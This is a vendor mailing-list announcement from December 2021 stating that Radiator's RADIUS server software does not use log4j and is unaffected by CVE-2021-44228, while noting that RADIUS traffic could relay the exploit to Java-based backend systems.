From dlr at radiatorsoftware.com Mon Dec 13 10:52:02 2021 From: dlr at radiatorsoftware.com (Daniela Loya) Date: Mon, 13 Dec 2021 12:52:02 +0200 Subject: [RADIATOR-ANNOUNCE] Radiator is not affected by log4j vulnerability Message-ID: On the 10th of December 2021 a vulnerability (CVE-2021-44228 ) in a popular Java-based logging utility log4j was published. Since then, we have received some customer queries about Radiator?s vulnerability. Radiator does not utilise Java or log4j as a component of our software and is therefore not vulnerable to the log4j vulnerability. While closely following the situation, research, and responses around the vulnerability, we have identified that RADIUS protocol and infrastructure can be used to deliver the exploit to more vulnerable services such as Java-based backend services, AAA information sources and centralised logging systems. We have documented this delivery method principle into a separate blog post found here: https://blog.radiatorsoftware.com/2021/12/radius-servers-and-log4j-vulnerability.html We will continue monitoring the issue closely and announce if issues affecting Radiator or Radiator services are found. -- Daniela Loya Ramos Sales, Radiator Software Oy www.radiatorsoftware.com -------------- next part -------------- An HTML attachment was scrubbed... URL: